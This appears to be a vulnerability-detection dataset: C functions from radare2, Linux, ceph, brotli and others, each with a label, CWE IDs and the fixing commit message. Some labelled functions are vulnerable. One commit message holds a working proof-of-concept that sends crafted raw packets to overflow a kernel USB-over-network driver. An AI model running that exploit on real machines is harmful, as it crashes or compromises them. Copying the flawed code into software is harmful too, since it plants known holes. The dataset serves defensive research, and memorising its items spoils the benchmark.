static Var* Pe_r_bin_pe_parse_var(RBinPEObj* pe, PE_DWord* curAddr) { Var* var = calloc (1, sizeof (*var)); if (!var) { pe_printf ("Warning: calloc (Var)\n"); return NULL; } if ((var->wLength = r_buf_read_le16_at (pe->b, *curAddr)) == UT16_MAX) { pe_printf ("Warning: read (Var wLength)\n"); free_Var (var); return NULL; } *curAddr += sizeof (var->wLength); if ((var->wValueLength = r_buf_read_le16_at (pe->b, *curAddr)) == UT16_MAX) { pe_printf ("Warning: read (Var wValueLength)\n"); free_Var (var); return NULL; } *curAddr += sizeof (var->wValueLength); if ((var->wType = r_buf_read_le16_at (pe->b, *curAddr)) == UT16_MAX) { pe_printf ("Warning: read (Var wType)\n"); free_Var (var); return NULL; } *curAddr += sizeof (var->wType); if (var->wType != 0 && var->wType != 1) { pe_printf ("Warning: check (Var wType)\n"); free_Var (var); return NULL; } var->szKey = (ut16*) malloc (UT16_ALIGN (TRANSLATION_UTF_16_LEN)); //L"Translation" if (!var->szKey) { pe_printf ("Warning: malloc (Var szKey)\n"); free_Var (var); return NULL; } if (r_buf_read_at (pe->b, *curAddr, (ut8*) var->szKey, TRANSLATION_UTF_16_LEN) < 1) { pe_printf ("Warning: read (Var szKey)\n"); free_Var (var); return NULL; } *curAddr += TRANSLATION_UTF_16_LEN; if (memcmp (var->szKey, TRANSLATION_UTF_16, TRANSLATION_UTF_16_LEN)) { pe_printf ("Warning: check (Var szKey)\n"); free_Var (var); return NULL; } align32 (*curAddr); var->numOfValues = var->wValueLength / 4; if (!var->numOfValues) { pe_printf ("Warning: check (Var numOfValues)\n"); free_Var (var); return NULL; } var->Value = (ut32*) malloc (var->wValueLength); if (!var->Value) { pe_printf ("Warning: malloc (Var Value)\n"); free_Var (var); return NULL; } if (r_buf_read_at (pe->b, *curAddr, (ut8*) var->Value, var->wValueLength) != var->wValueLength) { pe_printf ("Warning: read (Var Value)\n"); free_Var (var); return NULL; } *curAddr += var->wValueLength; return var; }
1
[ "CWE-400", "CWE-703" ]
radare2
634b886e84a5c568d243e744becc6b3223e089cf
237,260,582,706,114,450,000,000,000,000,000,000,000
68
Fix DoS in PE/QNX/DYLDCACHE/PSX parsers ##crash * Reported by lazymio * Reproducer: AAA4AAAAAB4=
void Monitor::handle_signal(int signum) { assert(signum == SIGINT || signum == SIGTERM); derr << "*** Got Signal " << sig_str(signum) << " ***" << dendl; shutdown(); }
0
[ "CWE-287", "CWE-284" ]
ceph
5ead97120e07054d80623dada90a5cc764c28468
304,941,564,105,649,560,000,000,000,000,000,000,000
6
auth/cephx: add authorizer challenge Allow the accepting side of a connection to reject an initial authorizer with a random challenge. The connecting side then has to respond with an updated authorizer proving they are able to decrypt the service's challenge and that the new authorizer was produced for this specific connection instance. The accepting side requires this challenge and response unconditionally if the client side advertises they have the feature bit. Servers wishing to require this improved level of authentication simply have to require the appropriate feature. Signed-off-by: Sage Weil <[email protected]> (cherry picked from commit f80b848d3f830eb6dba50123e04385173fa4540b) # Conflicts: # src/auth/Auth.h # src/auth/cephx/CephxProtocol.cc # src/auth/cephx/CephxProtocol.h # src/auth/none/AuthNoneProtocol.h # src/msg/Dispatcher.h # src/msg/async/AsyncConnection.cc - const_iterator - ::decode vs decode - AsyncConnection ctor arg noise - get_random_bytes(), not cct->random()
int match_re(my_regex_t *re, char *str) { while (my_isspace(charset_info, *str)) str++; if (str[0] == '/' && str[1] == '*') { char *comm_end= strstr (str, "*/"); if (! comm_end) die("Statement is unterminated comment"); str= comm_end + 2; } int err= my_regexec(re, str, (size_t)0, NULL, 0); if (err == 0) return 1; else if (err == REG_NOMATCH) return 0; { char erbuf[100]; int len= my_regerror(err, re, erbuf, sizeof(erbuf)); die("error %s, %d/%d `%s'\n", re_eprint(err), (int)len, (int)sizeof(erbuf), erbuf); } return 0; }
0
[ "CWE-295" ]
mysql-server
b3e9211e48a3fb586e88b0270a175d2348935424
333,984,851,250,940,700,000,000,000,000,000,000,000
27
WL#9072: Backport WL#8785 to 5.5
void flush_tlb_page(struct vm_area_struct *vma, unsigned long start) { struct mm_struct *mm = vma->vm_mm; preempt_disable(); if (current->active_mm == mm) { if (current->mm) __flush_tlb_one(start); else leave_mm(smp_processor_id()); } if (cpumask_any_but(mm_cpumask(mm), smp_processor_id()) < nr_cpu_ids) flush_tlb_others(mm_cpumask(mm), mm, start, 0UL); preempt_enable(); }
1
[ "CWE-362" ]
linux
71b3c126e61177eb693423f2e18a1914205b165e
48,340,948,654,172,530,000,000,000,000,000,000,000
18
x86/mm: Add barriers and document switch_mm()-vs-flush synchronization When switch_mm() activates a new PGD, it also sets a bit that tells other CPUs that the PGD is in use so that TLB flush IPIs will be sent. In order for that to work correctly, the bit needs to be visible prior to loading the PGD and therefore starting to fill the local TLB. Document all the barriers that make this work correctly and add a couple that were missing. Signed-off-by: Andy Lutomirski <[email protected]> Cc: Andrew Morton <[email protected]> Cc: Andy Lutomirski <[email protected]> Cc: Borislav Petkov <[email protected]> Cc: Brian Gerst <[email protected]> Cc: Dave Hansen <[email protected]> Cc: Denys Vlasenko <[email protected]> Cc: H. Peter Anvin <[email protected]> Cc: Linus Torvalds <[email protected]> Cc: Peter Zijlstra <[email protected]> Cc: Rik van Riel <[email protected]> Cc: Thomas Gleixner <[email protected]> Cc: [email protected] Cc: [email protected] Signed-off-by: Ingo Molnar <[email protected]>
static int oz_hcd_hub_control(struct usb_hcd *hcd, u16 req_type, u16 wvalue, u16 windex, char *buf, u16 wlength) { int err = 0; switch (req_type) { case ClearHubFeature: oz_dbg(HUB, "ClearHubFeature: %d\n", req_type); break; case ClearPortFeature: err = oz_clear_port_feature(hcd, wvalue, windex); break; case GetHubDescriptor: oz_get_hub_descriptor(hcd, (struct usb_hub_descriptor *)buf); break; case GetHubStatus: oz_dbg(HUB, "GetHubStatus: req_type = 0x%x\n", req_type); put_unaligned(cpu_to_le32(0), (__le32 *)buf); break; case GetPortStatus: err = oz_get_port_status(hcd, windex, buf); break; case SetHubFeature: oz_dbg(HUB, "SetHubFeature: %d\n", req_type); break; case SetPortFeature: err = oz_set_port_feature(hcd, wvalue, windex); break; default: oz_dbg(HUB, "Other: %d\n", req_type); break; } return err; }
0
[ "CWE-703", "CWE-189" ]
linux
b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c
80,046,400,601,615,030,000,000,000,000,000,000,000
34
ozwpan: Use unsigned ints to prevent heap overflow Using signed integers, the subtraction between required_size and offset could wind up being negative, resulting in a memcpy into a heap buffer with a negative length, resulting in huge amounts of network-supplied data being copied into the heap, which could potentially lead to remote code execution.. This is remotely triggerable with a magic packet. A PoC which obtains DoS follows below. It requires the ozprotocol.h file from this module. =-=-=-=-=-= #include <arpa/inet.h> #include <linux/if_packet.h> #include <net/if.h> #include <netinet/ether.h> #include <stdio.h> #include <string.h> #include <stdlib.h> #include <endian.h> #include <sys/ioctl.h> #include <sys/socket.h> #define u8 uint8_t #define u16 uint16_t #define u32 uint32_t #define __packed __attribute__((__packed__)) #include "ozprotocol.h" static int hex2num(char c) { if (c >= '0' && c <= '9') return c - '0'; if (c >= 'a' && c <= 'f') return c - 'a' + 10; if (c >= 'A' && c <= 'F') return c - 'A' + 10; return -1; } static int hwaddr_aton(const char *txt, uint8_t *addr) { int i; for (i = 0; i < 6; i++) { int a, b; a = hex2num(*txt++); if (a < 0) return -1; b = hex2num(*txt++); if (b < 0) return -1; *addr++ = (a << 4) | b; if (i < 5 && *txt++ != ':') return -1; } return 0; } int main(int argc, char *argv[]) { if (argc < 3) { fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]); return 1; } uint8_t dest_mac[6]; if (hwaddr_aton(argv[2], dest_mac)) { fprintf(stderr, "Invalid mac address.\n"); return 1; } int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); if (sockfd < 0) { perror("socket"); return 1; } struct ifreq if_idx; int interface_index; strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1); if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) { perror("SIOCGIFINDEX"); return 1; } interface_index = if_idx.ifr_ifindex; if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) { perror("SIOCGIFHWADDR"); return 1; } uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_elt_connect_req oz_elt_connect_req; } __packed connect_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(0) }, .oz_elt = { .type = OZ_ELT_CONNECT_REQ, .length = sizeof(struct oz_elt_connect_req) }, .oz_elt_connect_req = { .mode = 0, .resv1 = {0}, .pd_info = 0, .session_id = 0, .presleep = 35, .ms_isoc_latency = 0, .host_vendor = 0, .keep_alive = 0, .apps = htole16((1 << OZ_APPID_USB) | 0x1), .max_len_div16 = 0, .ms_per_isoc = 0, .up_audio_buf = 0, .ms_per_elt = 0 } }; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_get_desc_rsp oz_get_desc_rsp; } __packed pwn_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(1) }, .oz_elt = { .type = OZ_ELT_APP_DATA, .length = sizeof(struct oz_get_desc_rsp) }, .oz_get_desc_rsp = { .app_id = OZ_APPID_USB, .elt_seq_num = 0, .type = OZ_GET_DESC_RSP, .req_id = 0, .offset = htole16(2), .total_size = htole16(1), .rcode = 0, .data = {0} } }; struct sockaddr_ll socket_address = { .sll_ifindex = interface_index, .sll_halen = ETH_ALEN, .sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }; if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } usleep(300000); if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } return 0; } Signed-off-by: Jason A. Donenfeld <[email protected]> Acked-by: Dan Carpenter <[email protected]> Cc: stable <[email protected]> Signed-off-by: Greg Kroah-Hartman <[email protected]>
__blk_mq_alloc_request(struct blk_mq_alloc_data *data, int rw) { struct request *rq; unsigned int tag; tag = blk_mq_get_tag(data); if (tag != BLK_MQ_TAG_FAIL) { rq = data->hctx->tags->rqs[tag]; if (blk_mq_tag_busy(data->hctx)) { rq->cmd_flags = REQ_MQ_INFLIGHT; atomic_inc(&data->hctx->nr_active); } rq->tag = tag; blk_mq_rq_ctx_init(data->q, data->ctx, rq, rw); return rq; } return NULL; }
0
[ "CWE-362", "CWE-264" ]
linux
0048b4837affd153897ed1222283492070027aa9
10,725,653,674,652,838,000,000,000,000,000,000,000
21
blk-mq: fix race between timeout and freeing request Inside timeout handler, blk_mq_tag_to_rq() is called to retrieve the request from one tag. This way is obviously wrong because the request can be freed any time and some fiedds of the request can't be trusted, then kernel oops might be triggered[1]. Currently wrt. blk_mq_tag_to_rq(), the only special case is that the flush request can share same tag with the request cloned from, and the two requests can't be active at the same time, so this patch fixes the above issue by updating tags->rqs[tag] with the active request(either flush rq or the request cloned from) of the tag. Also blk_mq_tag_to_rq() gets much simplified with this patch. Given blk_mq_tag_to_rq() is mainly for drivers and the caller must make sure the request can't be freed, so in bt_for_each() this helper is replaced with tags->rqs[tag]. [1] kernel oops log [ 439.696220] BUG: unable to handle kernel NULL pointer dereference at 0000000000000158^M [ 439.697162] IP: [<ffffffff812d89ba>] blk_mq_tag_to_rq+0x21/0x6e^M [ 439.700653] PGD 7ef765067 PUD 7ef764067 PMD 0 ^M [ 439.700653] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC ^M [ 439.700653] Dumping ftrace buffer:^M [ 439.700653] (ftrace buffer empty)^M [ 439.700653] Modules linked in: nbd ipv6 kvm_intel kvm serio_raw^M [ 439.700653] CPU: 6 PID: 2779 Comm: stress-ng-sigfd Not tainted 4.2.0-rc5-next-20150805+ #265^M [ 439.730500] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011^M [ 439.730500] task: ffff880605308000 ti: ffff88060530c000 task.ti: ffff88060530c000^M [ 439.730500] RIP: 0010:[<ffffffff812d89ba>] [<ffffffff812d89ba>] blk_mq_tag_to_rq+0x21/0x6e^M [ 439.730500] RSP: 0018:ffff880819203da0 EFLAGS: 00010283^M [ 439.730500] RAX: ffff880811b0e000 RBX: ffff8800bb465f00 RCX: 0000000000000002^M [ 439.730500] RDX: 0000000000000000 RSI: 0000000000000202 RDI: 0000000000000000^M [ 439.730500] RBP: ffff880819203db0 R08: 0000000000000002 R09: 0000000000000000^M [ 439.730500] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000202^M [ 439.730500] R13: ffff880814104800 R14: 0000000000000002 R15: ffff880811a2ea00^M [ 439.730500] FS: 00007f165b3f5740(0000) GS:ffff880819200000(0000) knlGS:0000000000000000^M [ 439.730500] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b^M [ 439.730500] CR2: 0000000000000158 CR3: 00000007ef766000 CR4: 00000000000006e0^M [ 439.730500] Stack:^M [ 439.730500] 0000000000000008 ffff8808114eed90 ffff880819203e00 ffffffff812dc104^M [ 439.755663] ffff880819203e40 ffffffff812d9f5e 0000020000000000 ffff8808114eed80^M [ 439.755663] Call Trace:^M [ 439.755663] <IRQ> ^M [ 439.755663] [<ffffffff812dc104>] bt_for_each+0x6e/0xc8^M [ 439.755663] [<ffffffff812d9f5e>] ? blk_mq_rq_timed_out+0x6a/0x6a^M [ 439.755663] [<ffffffff812d9f5e>] ? blk_mq_rq_timed_out+0x6a/0x6a^M [ 439.755663] [<ffffffff812dc1b3>] blk_mq_tag_busy_iter+0x55/0x5e^M [ 439.755663] [<ffffffff812d88b4>] ? blk_mq_bio_to_request+0x38/0x38^M [ 439.755663] [<ffffffff812d8911>] blk_mq_rq_timer+0x5d/0xd4^M [ 439.755663] [<ffffffff810a3e10>] call_timer_fn+0xf7/0x284^M [ 439.755663] [<ffffffff810a3d1e>] ? call_timer_fn+0x5/0x284^M [ 439.755663] [<ffffffff812d88b4>] ? blk_mq_bio_to_request+0x38/0x38^M [ 439.755663] [<ffffffff810a46d6>] run_timer_softirq+0x1ce/0x1f8^M [ 439.755663] [<ffffffff8104c367>] __do_softirq+0x181/0x3a4^M [ 439.755663] [<ffffffff8104c76e>] irq_exit+0x40/0x94^M [ 439.755663] [<ffffffff81031482>] smp_apic_timer_interrupt+0x33/0x3e^M [ 439.755663] [<ffffffff815559a4>] apic_timer_interrupt+0x84/0x90^M [ 439.755663] <EOI> ^M [ 439.755663] [<ffffffff81554350>] ? _raw_spin_unlock_irq+0x32/0x4a^M [ 439.755663] [<ffffffff8106a98b>] finish_task_switch+0xe0/0x163^M [ 439.755663] [<ffffffff8106a94d>] ? finish_task_switch+0xa2/0x163^M [ 439.755663] [<ffffffff81550066>] __schedule+0x469/0x6cd^M [ 439.755663] [<ffffffff8155039b>] schedule+0x82/0x9a^M [ 439.789267] [<ffffffff8119b28b>] signalfd_read+0x186/0x49a^M [ 439.790911] [<ffffffff8106d86a>] ? wake_up_q+0x47/0x47^M [ 439.790911] [<ffffffff811618c2>] __vfs_read+0x28/0x9f^M [ 439.790911] [<ffffffff8117a289>] ? __fget_light+0x4d/0x74^M [ 439.790911] [<ffffffff811620a7>] vfs_read+0x7a/0xc6^M [ 439.790911] [<ffffffff8116292b>] SyS_read+0x49/0x7f^M [ 439.790911] [<ffffffff81554c17>] entry_SYSCALL_64_fastpath+0x12/0x6f^M [ 439.790911] Code: 48 89 e5 e8 a9 b8 e7 ff 5d c3 0f 1f 44 00 00 55 89 f2 48 89 e5 41 54 41 89 f4 53 48 8b 47 60 48 8b 1c d0 48 8b 7b 30 48 8b 53 38 <48> 8b 87 58 01 00 00 48 85 c0 75 09 48 8b 97 88 0c 00 00 eb 10 ^M [ 439.790911] RIP [<ffffffff812d89ba>] blk_mq_tag_to_rq+0x21/0x6e^M [ 439.790911] RSP <ffff880819203da0>^M [ 439.790911] CR2: 0000000000000158^M [ 439.790911] ---[ end trace d40af58949325661 ]---^M Cc: <[email protected]> Signed-off-by: Ming Lei <[email protected]> Signed-off-by: Jens Axboe <[email protected]>
memxor3_different_alignment_ab (word_t *dst, const char *a, const char *b, unsigned offset, size_t n) { int shl, shr; const word_t *a_word; const word_t *b_word; word_t s0, s1; shl = CHAR_BIT * offset; shr = CHAR_BIT * (sizeof(word_t) - offset); a_word = (const word_t *) ((uintptr_t) a & -sizeof(word_t)); b_word = (const word_t *) ((uintptr_t) b & -sizeof(word_t)); if (n & 1) { n--; s1 = a_word[n] ^ b_word[n]; s0 = a_word[n+1] ^ b_word[n+1]; dst[n] = MERGE (s1, shl, s0, shr); } else s1 = a_word[n] ^ b_word[n]; while (n > 0) { n -= 2; s0 = a_word[n+1] ^ b_word[n+1]; dst[n+1] = MERGE(s0, shl, s1, shr); s1 = a_word[n] ^ b_word[n]; dst[n] = MERGE(s1, shl, s0, shr); } }
1
[]
nettle
842abf376289059cd3dce34a851a3f701ad1f9b3
303,478,346,986,540,450,000,000,000,000,000,000,000
35
Fixed out-of-bounds reads in memxor3.
static BROTLI_INLINE BrotliDecoderErrorCode ProcessCommandsInternal( int safe, BrotliDecoderState* s) { int pos = s->pos; int i = s->loop_counter; BrotliDecoderErrorCode result = BROTLI_DECODER_SUCCESS; BrotliBitReader* br = &s->br; if (!CheckInputAmount(safe, br, 28)) { result = BROTLI_DECODER_NEEDS_MORE_INPUT; goto saveStateAndReturn; } if (!safe) { BROTLI_UNUSED(BrotliWarmupBitReader(br)); } /* Jump into state machine. */ if (s->state == BROTLI_STATE_COMMAND_BEGIN) { goto CommandBegin; } else if (s->state == BROTLI_STATE_COMMAND_INNER) { goto CommandInner; } else if (s->state == BROTLI_STATE_COMMAND_POST_DECODE_LITERALS) { goto CommandPostDecodeLiterals; } else if (s->state == BROTLI_STATE_COMMAND_POST_WRAP_COPY) { goto CommandPostWrapCopy; } else { return BROTLI_FAILURE(BROTLI_DECODER_ERROR_UNREACHABLE); } CommandBegin: if (safe) { s->state = BROTLI_STATE_COMMAND_BEGIN; } if (!CheckInputAmount(safe, br, 28)) { /* 156 bits + 7 bytes */ s->state = BROTLI_STATE_COMMAND_BEGIN; result = BROTLI_DECODER_NEEDS_MORE_INPUT; goto saveStateAndReturn; } if (BROTLI_PREDICT_FALSE(s->block_length[1] == 0)) { BROTLI_SAFE(DecodeCommandBlockSwitch(s)); goto CommandBegin; } /* Read the insert/copy length in the command. */ BROTLI_SAFE(ReadCommand(s, br, &i)); BROTLI_LOG(("[ProcessCommandsInternal] pos = %d insert = %d copy = %d\n", pos, i, s->copy_length)); if (i == 0) { goto CommandPostDecodeLiterals; } s->meta_block_remaining_len -= i; CommandInner: if (safe) { s->state = BROTLI_STATE_COMMAND_INNER; } /* Read the literals in the command. */ if (s->trivial_literal_context) { uint32_t bits; uint32_t value; PreloadSymbol(safe, s->literal_htree, br, &bits, &value); do { if (!CheckInputAmount(safe, br, 28)) { /* 162 bits + 7 bytes */ s->state = BROTLI_STATE_COMMAND_INNER; result = BROTLI_DECODER_NEEDS_MORE_INPUT; goto saveStateAndReturn; } if (BROTLI_PREDICT_FALSE(s->block_length[0] == 0)) { BROTLI_SAFE(DecodeLiteralBlockSwitch(s)); PreloadSymbol(safe, s->literal_htree, br, &bits, &value); if (!s->trivial_literal_context) goto CommandInner; } if (!safe) { s->ringbuffer[pos] = (uint8_t)ReadPreloadedSymbol(s->literal_htree, br, &bits, &value); } else { uint32_t literal; if (!SafeReadSymbol(s->literal_htree, br, &literal)) { result = BROTLI_DECODER_NEEDS_MORE_INPUT; goto saveStateAndReturn; } s->ringbuffer[pos] = (uint8_t)literal; } --s->block_length[0]; BROTLI_LOG_ARRAY_INDEX(s->ringbuffer, pos); ++pos; if (BROTLI_PREDICT_FALSE(pos == s->ringbuffer_size)) { s->state = BROTLI_STATE_COMMAND_INNER_WRITE; --i; goto saveStateAndReturn; } } while (--i != 0); } else { uint8_t p1 = s->ringbuffer[(pos - 1) & s->ringbuffer_mask]; uint8_t p2 = s->ringbuffer[(pos - 2) & s->ringbuffer_mask]; do { const HuffmanCode* hc; uint8_t context; if (!CheckInputAmount(safe, br, 28)) { /* 162 bits + 7 bytes */ s->state = BROTLI_STATE_COMMAND_INNER; result = BROTLI_DECODER_NEEDS_MORE_INPUT; goto saveStateAndReturn; } if (BROTLI_PREDICT_FALSE(s->block_length[0] == 0)) { BROTLI_SAFE(DecodeLiteralBlockSwitch(s)); if (s->trivial_literal_context) goto CommandInner; } context = BROTLI_CONTEXT(p1, p2, s->context_lookup); BROTLI_LOG_UINT(context); hc = s->literal_hgroup.htrees[s->context_map_slice[context]]; p2 = p1; if (!safe) { p1 = (uint8_t)ReadSymbol(hc, br); } else { uint32_t literal; if (!SafeReadSymbol(hc, br, &literal)) { result = BROTLI_DECODER_NEEDS_MORE_INPUT; goto saveStateAndReturn; } p1 = (uint8_t)literal; } s->ringbuffer[pos] = p1; --s->block_length[0]; BROTLI_LOG_UINT(s->context_map_slice[context]); BROTLI_LOG_ARRAY_INDEX(s->ringbuffer, pos & s->ringbuffer_mask); ++pos; if (BROTLI_PREDICT_FALSE(pos == s->ringbuffer_size)) { s->state = BROTLI_STATE_COMMAND_INNER_WRITE; --i; goto saveStateAndReturn; } } while (--i != 0); } BROTLI_LOG_UINT(s->meta_block_remaining_len); if (BROTLI_PREDICT_FALSE(s->meta_block_remaining_len <= 0)) { s->state = BROTLI_STATE_METABLOCK_DONE; goto saveStateAndReturn; } CommandPostDecodeLiterals: if (safe) { s->state = BROTLI_STATE_COMMAND_POST_DECODE_LITERALS; } if (s->distance_code >= 0) { /* Implicit distance case. */ s->distance_context = s->distance_code ? 0 : 1; --s->dist_rb_idx; s->distance_code = s->dist_rb[s->dist_rb_idx & 3]; } else { /* Read distance code in the command, unless it was implicitly zero. */ if (BROTLI_PREDICT_FALSE(s->block_length[2] == 0)) { BROTLI_SAFE(DecodeDistanceBlockSwitch(s)); } BROTLI_SAFE(ReadDistance(s, br)); } BROTLI_LOG(("[ProcessCommandsInternal] pos = %d distance = %d\n", pos, s->distance_code)); if (s->max_distance != s->max_backward_distance) { s->max_distance = (pos < s->max_backward_distance) ? pos : s->max_backward_distance; } i = s->copy_length; /* Apply copy of LZ77 back-reference, or static dictionary reference if the distance is larger than the max LZ77 distance */ if (s->distance_code > s->max_distance) { /* The maximum allowed distance is BROTLI_MAX_ALLOWED_DISTANCE = 0x7FFFFFFC. With this choice, no signed overflow can occur after decoding a special distance code (e.g., after adding 3 to the last distance). */ if (s->distance_code > BROTLI_MAX_ALLOWED_DISTANCE) { BROTLI_LOG(("Invalid backward reference. pos: %d distance: %d " "len: %d bytes left: %d\n", pos, s->distance_code, i, s->meta_block_remaining_len)); return BROTLI_FAILURE(BROTLI_DECODER_ERROR_FORMAT_DISTANCE); } if (i >= BROTLI_MIN_DICTIONARY_WORD_LENGTH && i <= BROTLI_MAX_DICTIONARY_WORD_LENGTH) { int address = s->distance_code - s->max_distance - 1; const BrotliDictionary* words = s->dictionary; const BrotliTransforms* transforms = s->transforms; int offset = (int)s->dictionary->offsets_by_length[i]; uint32_t shift = s->dictionary->size_bits_by_length[i]; int mask = (int)BitMask(shift); int word_idx = address & mask; int transform_idx = address >> shift; /* Compensate double distance-ring-buffer roll. */ s->dist_rb_idx += s->distance_context; offset += word_idx * i; if (BROTLI_PREDICT_FALSE(!words->data)) { return BROTLI_FAILURE(BROTLI_DECODER_ERROR_DICTIONARY_NOT_SET); } if (transform_idx < (int)transforms->num_transforms) { const uint8_t* word = &words->data[offset]; int len = i; if (transform_idx == transforms->cutOffTransforms[0]) { memcpy(&s->ringbuffer[pos], word, (size_t)len); BROTLI_LOG(("[ProcessCommandsInternal] dictionary word: [%.*s]\n", len, word)); } else { len = BrotliTransformDictionaryWord(&s->ringbuffer[pos], word, len, transforms, transform_idx); BROTLI_LOG(("[ProcessCommandsInternal] dictionary word: [%.*s]," " transform_idx = %d, transformed: [%.*s]\n", i, word, transform_idx, len, &s->ringbuffer[pos])); } pos += len; s->meta_block_remaining_len -= len; if (pos >= s->ringbuffer_size) { s->state = BROTLI_STATE_COMMAND_POST_WRITE_1; goto saveStateAndReturn; } } else { BROTLI_LOG(("Invalid backward reference. pos: %d distance: %d " "len: %d bytes left: %d\n", pos, s->distance_code, i, s->meta_block_remaining_len)); return BROTLI_FAILURE(BROTLI_DECODER_ERROR_FORMAT_TRANSFORM); } } else { BROTLI_LOG(("Invalid backward reference. pos: %d distance: %d " "len: %d bytes left: %d\n", pos, s->distance_code, i, s->meta_block_remaining_len)); return BROTLI_FAILURE(BROTLI_DECODER_ERROR_FORMAT_DICTIONARY); } } else { int src_start = (pos - s->distance_code) & s->ringbuffer_mask; uint8_t* copy_dst = &s->ringbuffer[pos]; uint8_t* copy_src = &s->ringbuffer[src_start]; int dst_end = pos + i; int src_end = src_start + i; /* Update the recent distances cache. */ s->dist_rb[s->dist_rb_idx & 3] = s->distance_code; ++s->dist_rb_idx; s->meta_block_remaining_len -= i; /* There are 32+ bytes of slack in the ring-buffer allocation. Also, we have 16 short codes, that make these 16 bytes irrelevant in the ring-buffer. Let's copy over them as a first guess. */ memmove16(copy_dst, copy_src); if (src_end > pos && dst_end > src_start) { /* Regions intersect. */ goto CommandPostWrapCopy; } if (dst_end >= s->ringbuffer_size || src_end >= s->ringbuffer_size) { /* At least one region wraps. */ goto CommandPostWrapCopy; } pos += i; if (i > 16) { if (i > 32) { memcpy(copy_dst + 16, copy_src + 16, (size_t)(i - 16)); } else { /* This branch covers about 45% cases. Fixed size short copy allows more compiler optimizations. */ memmove16(copy_dst + 16, copy_src + 16); } } } BROTLI_LOG_UINT(s->meta_block_remaining_len); if (s->meta_block_remaining_len <= 0) { /* Next metablock, if any. */ s->state = BROTLI_STATE_METABLOCK_DONE; goto saveStateAndReturn; } else { goto CommandBegin; } CommandPostWrapCopy: { int wrap_guard = s->ringbuffer_size - pos; while (--i >= 0) { s->ringbuffer[pos] = s->ringbuffer[(pos - s->distance_code) & s->ringbuffer_mask]; ++pos; if (BROTLI_PREDICT_FALSE(--wrap_guard == 0)) { s->state = BROTLI_STATE_COMMAND_POST_WRITE_2; goto saveStateAndReturn; } } } if (s->meta_block_remaining_len <= 0) { /* Next metablock, if any. */ s->state = BROTLI_STATE_METABLOCK_DONE; goto saveStateAndReturn; } else { goto CommandBegin; } saveStateAndReturn: s->pos = pos; s->loop_counter = i; return result; }
0
[ "CWE-120" ]
brotli
223d80cfbec8fd346e32906c732c8ede21f0cea6
146,653,028,540,721,590,000,000,000,000,000,000,000
288
Update (#826) * IMPORTANT: decoder: fix potential overflow when input chunk is >2GiB * simplify max Huffman table size calculation * eliminate symbol duplicates (static arrays in .h files) * minor combing in research/ code
PHP_FUNCTION(tanh) { double num; if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "d", &num) == FAILURE) { return; } RETURN_DOUBLE(tanh(num)); }
0
[]
php-src
0d822f6df946764f3f0348b82efae2e1eaa83aa0
310,299,786,127,503,830,000,000,000,000,000,000,000
9
Bug #71201 round() segfault on 64-bit builds
static int __ip6_del_rt(struct rt6_info *rt, struct nl_info *info) { int err; struct fib6_table *table; struct net *net = dev_net(rt->dst.dev); if (rt == net->ipv6.ip6_null_entry) { err = -ENOENT; goto out; } table = rt->rt6i_table; write_lock_bh(&table->tb6_lock); err = fib6_del(rt, info); write_unlock_bh(&table->tb6_lock); out: ip6_rt_put(rt); return err; }
0
[ "CWE-119" ]
net
c88507fbad8055297c1d1e21e599f46960cbee39
148,217,808,698,948,080,000,000,000,000,000,000,000
20
ipv6: don't set DST_NOCOUNT for remotely added routes DST_NOCOUNT should only be used if an authorized user adds routes locally. In case of routes which are added on behalf of router advertisments this flag must not get used as it allows an unlimited number of routes getting added remotely. Signed-off-by: Sabrina Dubroca <[email protected]> Acked-by: Hannes Frederic Sowa <[email protected]> Signed-off-by: David S. Miller <[email protected]>
